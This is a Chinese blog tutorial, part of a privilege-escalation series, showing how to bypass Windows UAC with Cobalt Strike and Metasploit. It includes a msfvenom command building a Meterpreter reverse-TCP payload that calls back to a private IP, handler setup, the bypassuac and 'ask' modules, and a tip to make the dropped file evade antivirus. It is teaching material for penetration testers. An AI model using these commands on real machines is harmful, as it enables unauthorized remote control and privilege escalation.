首页 > 其他分享 >操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

时间:2023-07-05 15:32:49浏览次数:54  
标签:用户 提权 模块 CS UAC 绕过


系列文章

操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

MSF和CS绕过UAC提权

CS绕过UAC提权

拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_windows

执行添加用户的命令时显示拒绝访问

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_windows_02


使用CS自带的插件进行绕过提权

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_03


直接提到了system权限

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_04


操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_system权限_05

提权后可以完成添加用户的命令

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_system权限_06

MSF绕过UAC

bypassuac模块

使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置

生成一个MSF的SHELL

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -f exe -o test.exe 
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 3333
exploit

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络安全_07

getuid

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_08

试一下getsystem发现失败

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_09

msf搜索 bypassuac 得到很多模块

search bypassuac

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_10

使用一个模块试一试

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_system权限_11

RUNAS模块绕过UAC

该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell

这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可

use exploit/windows/local/ask

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_安全_12

用户点击后直接获取高权限

操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权_网络_13


标签:用户,提权,模块,CS,UAC,绕过
From: https://blog.51cto.com/u_16179749/6632472

相关文章

  • Selenium自动化程序被检测为爬虫,怎么屏蔽和绕过
    先打开浏览器,再链接操作1、打开浏览器时添加以下参数:--remote-debugging-port=9222--user-data-dir="C:\\selenium\\ChromeProfile"2、selenium中设置浏览器选项,通过上面设置的9222端口连接浏览器:fromselenium.webdriver.chrome.optionsimportOptionschrome_option......
  • 绕过CDN找IP
    判断ip是否为网站真实ip1.使用nslookup判断如果返回域名结果为多个ip,多半是使用CDN,是不真实的ip2.多地ping查询如果ping的ip结果不唯一,则说明网站可能存在CDN。网站有:http://ping.chinaz.com/https://ping.aizhan.com/绕过CDN查看真实ip1.dns历史绑定记录异步在线D......
  • 漏洞深度分析 | Apache StreamPipes 存在权限绕过漏洞导致垂直越权
    项目地址https://github.com/apache/streampipes项目介绍ApacheStreamPipes使工业数据分析变得简单!StreamPipes是工业物联网的端到端工具箱。它带有针对非技术用户的丰富的图形用户界面,并提供以下功能: 快速连接超过20种工业协议,例如OPC-UA、PLC、MQTT、REST、Pulsar、Kafka......
  • CTFer成长记录——Web专题·双写绕过
    一、题目链接http://a.y1ng.vip:1126/employeeswork/二、题意解析  访问该网址:  发现是一些不明觉厉的英文:  关于Y1ng公司所有员工的通知:  如果你认为你对自己的工作感到满意,你可以使用函数work_worthy()。  但是是否值得,只会由我的机器人PrecocedeMalingre来......
  • Windows 11 绕过 TPM 方法总结,通用免 TPM 镜像下载 (2023 年 6 月更新)
    Windows11绕过TPM方法总结,通用免TPM镜像下载(2023年6月更新)在虚拟机、Mac电脑和TPM不符合要求的旧电脑上安装Windows11的通用方法总结请访问原文链接:https://sysin.org/blog/windows-11-no-tpm/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org本文......
  • 关于Nacos身份认证绕过漏洞默认密钥和JWT的研究
    前言由于本人的一个习惯,每次遇到漏洞并复现后都要编写poc,以便下一次的直接利用与复测使用。研究Nacos默认密钥和JWT的爱恨情仇的过程中遇到了莫名其妙的问题,在此做以记录,方便日后有大佬遇到相同的问题路过看到能够得以解决。研究过程在Nacos身份认证绕过漏洞复现文章中提到jwt.......
  • 记一次Nacos漏洞的复现 --> 身份认证绕过漏洞(QVD-2023-6271)
    前记端午前两天,遇到公司某客户的站点是Nacos,随后就是网上搜一波漏洞,搜到QVD-2023-6271,故做以下记录漏洞复现漏洞描述漏洞原理为开源服务管理平台Nacos在默认配置下未对token.secret.key进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。漏洞信息漏洞......
  • WEB安全-渗透测试-waf绕过信息收集
    waf绕过WAF拦截会出现在安全测试的各个层面,掌握各个层面的分析和绕过技术最为关键本文主要讲述以下四种环境下的waf绕过Safedog-默认拦截机制分析绕过-未开CCSafedog-默认拦截机制分析绕过-开启CCAliyun_os-默认拦截机制分析绕过-简要界面BT(防火墙插件)-默认拦截机制分......
  • JS逆向 -- 某资源网站下载验证绕过
    一、当搜索资源的时候,有时会遇到类似的情况,就是关注微信某公众号好,回复相应的内容,获取下载地址二、随便输入一个假的验证码,提示了验证码错误三、F12打开开发者工具,点击右上方的三个点,选择搜索,全局搜索“验证码错误”四、双击进入代码段,里面有个1219,输入验证码,点击提交查看五、成功......
  • Vulnhub之Cengbox 2靶机详细测试过程(利用不同的方法提权)
    Cengbox2识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Cengbox2]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......